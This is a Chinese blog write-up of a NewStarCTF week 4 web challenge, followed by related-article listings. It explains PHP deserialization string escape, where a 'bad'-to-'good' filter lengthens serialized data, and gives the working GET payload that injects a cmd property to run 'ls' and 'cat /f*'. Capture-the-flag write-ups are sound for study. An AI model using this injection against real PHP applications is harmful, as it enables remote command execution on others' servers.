逃(NewStar week4 web)

最新推荐文章于 2024-09-07 19:58:48 发布
最新推荐文章于 2024-09-07 19:58:48 发布
阅读量102 收藏
点赞数 1
文章标签: web安全 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66013948/article/details/134116569
版权

        起步,上代码:

<?php
highlight_file(__FILE__);
function waf($str){
    return str_replace("bad","good",$str);
}

class GetFlag {
    public $key;
    public $cmd = "whoami";
    public function __construct($key)
    {
        $this->key = $key;
    }
    public function __destruct()
    {
        system($this->cmd);
    }
}

unserialize(waf(serialize(new GetFlag($_GET['key']))));

刚开始拿到这个题的时候,看到最后的两个序列化和反序列化的魔术方法就可以知道,这道题是个明显的反序列化的题目,之后,再看waf()函数这里边的str_replace()函数内的两个字符串长度不一样,则可以知道这是个很明显的字符串变长的字符串逃逸。

        什么是字符逃逸呢:在反序列化的时候php会根据s所指定的字符长度去读取后边的字符,由于在序列化操作后又使用了str_replace()函数进行字符串替换,这就可能会改变字符串的长度,比如上面将bad替换为good,每替换掉一个bad,字符串长度明显就增加了1,而由于序列化之后s的值没变,但是进行了内容替换,改变了字符串长度,那么反序列化读取时,就并不能将原本的内容读取完全。而后面没有被读到的内容,也就是逃逸出来的字符串,就会被当做当前类的属性被继续执行。

        接着就是,改代码存在system()函数,因此可以认为是一个rce并且没有相关的过滤,于是就可以想办法将cmd这一属性的值改为ls或者cat之类的Linux命令来执行。

        因此,首先自己建立一个程序并将其复制进去,进行一个序列化,获取序列化后的参数,这时,截取

O:7:"GetFlag":2:{s:3:"key";s:3:"123";s:3:"cmd";s:6:"whoami";}

中的

123";s:3:"cmd";s:6:"whoami";}

并进行如下修改

badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:2:"ls";}

之后通过GET方式传递进去,看看能否执行,当然,答案是可以的,因此,我们接着修改cmd的参数为cat /f*来读取flag

?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:7:"cat /f*";}

最后,成功得到flag的值。

晓幂
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2023NewStarCTF [WEB] week4 字符串
2301_76690905的博客
10-29 282
第一种:还是同样的思路把最后的cmd排挤出去,用我们自己构建的cmd属性,但是这里问题就来了,我当时鼠标点错修改的是最后一个cmd,但是居然也出了flag,理论上这里已经被截断了呀。而且我定睛一看发现我刚刚的ls /也是这么来的,理论上key的长度不对应该什么都出不了。我们的思路就是把多出来的字符构造成功能性代码(即自己构造一个cmd属性),原本的功能性代码就不管了(不管给原本的cmd赋值什么都不重要了,因为我们已经自己动手构造cmd属性了,而原本的cmd会被废弃)的时候就会默认结束,意味着什么呢?
CTFSHOW PHP
qq_63676207的博客
11-13 673
v2$v3此题先看其在GET传三个参数v0那个有与运算符的先后性所以v1只能数字,即v2是指令v3必须有;字符构造playload方法一:?v1=1&v2=?>进行对前面的闭合内敛执行/* */ 对(‘ctfshow’)内容进行注释;进行代码闭合方法二:?对内容进行注释通过var_dump()将ctfshow荡出来利用注释这种的姿势很多下面讲另一种方法方法三:?
php反序列化学习之字符串
oyf3085227433的博客
02-13 1209
学习一下php反序列化中字符串逸的知识点
[wp]NewStarCTF 2023 WEEK4|WEB
m0_63138919的博客
10-23 1117
本文为[wp]NewStarCTF 2023 WEEK4|WEB 的解题思路
NewStar CTF Week3Misc 4-5Web
weixin_63231007的博客
12-05 1175
目录 Week-3 Misc(1) Whats HTTP(2) qsdz's girlfriend 3(3) WebShell!(4) 混沌的图像 Week-4 Web(1) So Baby RCE(%0A进行rce rev|sort读取flag)(2) UnserializeThree(%0d换行rce) week5-web(1) Give me your photo PLZ(.htaccess配置文件漏洞)(2) Unsafe Apache(CVE-2021-42013)(3) So
Begin of PHPNewStar week1 web2023)
qq_66013948的博客
10-26 194
很明显,这道题是用md5函数处理得到的key1和key2两个参数,这个时候,就需要知道php弱比较中的md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,两个数组经过加密后得到的都是NULL,也就是相等的,所以应该构造。这里可以知道,这里只需要让flag5为真就能够得到flag了,但是,在这里a-z,A-Z,0-9全被过滤了,那么,就要用非字母和数字的方式将其绕过,用post方式传递。is_numeric()可以检测参数为数字或者是字符串,是的话返回1,可以用多种方式绕过。
include 0。0(NewStar 2023 week2 web)
qq_66013948的博客
11-02 96
这种题型已经做过很多次了,不过这里需要浅谈一下过滤器,在本题目中,base和rot被过滤了,并且不区分大小写,在这里,这两种过滤器就不能用了,那么,这里就可以用到。convert.iconv.*过滤器,语法为。就是编码方式,有如下几种;
Newstar Ctf 2022 |week1
fevergun的博客
10-29 1637
Newstar CTF 2022 第一周wp
web学习笔记
热门推荐
刘群智的博客
07-27 1万+
常用属性............................................................................................ 1 Html基础........................................................................................... 3 ...
高德天气应用开发之二:android 高德天气API说明及城市天气查询实现
caobaokang的专栏
01-27 3604
项目源码请移步:https://github.com/caobaokang419/WeatherApp(欢迎Github Fork&Star,框架和技术实现不妥之处,请帮忙指正),谢谢! 基于MVVM框架的高德天气APP: 功能点实现说明: 高德天气查询:Get&Post方式可以正常返回查询高德天气数据并UI显示; 一、高德天气官方API: 链接:https://l...
Python学习[4]:urllib库-爬虫的第三步之代理IP
java技术专家全栈成长之路
11-27 2159
代理IP 代理ip就是可以模拟一个ip地址去访问某个网站爬取某个网站的大量信息时,可能由于我们爬的次数太多导致我们的ip被对方的服务器暂时屏蔽,比如微信文章爬虫超过5000次就直接被拦截了。 利用urllib的request就可以完成代理IP的使用 urlopen只是opener的通用版本,代理IP对于urlopen实现不了,opener需要自定义。 request里面正好有处理各种功能的...
Little_Women4.txt
m0_47456600的博客
08-21 1771
MEG This note, prettily written on scented paper, was a great contrast to the next, which was scribbled on a big sheet of thin foreign paper, ornamented with blots and all manner of flourishes and curly-tailed letters. My precious Marmee: Three cheers for
新视野大学英语读写教程4(第二版)答案
weixin_33757609的博客
03-21 1542
Unit 1III.1. idle 2. justify 3. discount 4. distinct 5. minute6.accused 7. object 8. contaminate 9. sustain 10. worshipIV.1. accusing... of 2. end up 3. came upon 4. at her worst 5. pay for6. run a ri...
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1626
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Web安全之SQL注入:如何预防及解决
最新发布
J老熊
09-07 1360
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 946
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
【网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 742
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1764
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
package week12; import javax.swing.*; public class FrmMain extends JFrame { ///菜单栏 private JMenuBar menubar = new JMenuBar(); //菜单 private JMenu menuUser = new JMenu("个人中心"); //下拉菜单项 private JMenultem register = new JMenultem("注册"); private JMenultem login = new JMenultem("登录"); private JMenultem center = new JMenultem("个人中心"); //底部状态栏 private JPanel statusBar = new JPanel(); //主面板:查询流浪猫信息后显示流浪猫信息 private JPanel mainPanel = new JPanel(); } public FrmMain(){ this.setTitle("幸运小猫爱心平台");//设置窗体标题 this.setSize(700,500);//设置窗体尺寸 //添加菜单 menubar.add(menuUser); menubar.add(admin); menubar.add(inSchool); menubar.add(graduate); menubar.add(dropOut); menubar.add(star); //添加menuUser菜单的下拉菜单项 menuUser.add(register); menuUser.add(login); } 帮我把这段代码修改正确
05-25
在您提供的代码中,有一个多余的右括号,将其删除即可。同时,您在添加菜单时使用了未定义的变量 admin、inSchool、graduate、dropOut 和 star,需要将它们删除或定义后再使用。 修改后的代码如下: ```java package week12; import javax.swing.*; public class FrmMain extends JFrame { //菜单栏 private JMenuBar menubar = new JMenuBar(); //菜单 private JMenu menuUser = new JMenu("个人中心"); //下拉菜单项 private JMenuItem register = new JMenuItem("注册"); private JMenuItem login = new JMenuItem("登录"); private JMenuItem center = new JMenuItem("个人中心"); //底部状态栏 private JPanel statusBar = new JPanel(); //主面板:查询流浪猫信息后显示流浪猫信息 private JPanel mainPanel = new JPanel(); public FrmMain(){ this.setTitle("幸运小猫爱心平台");//设置窗体标题 this.setSize(700,500);//设置窗体尺寸 //添加菜单 menubar.add(menuUser); //添加menuUser菜单的下拉菜单项 menuUser.add(register); menuUser.add(login); } } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值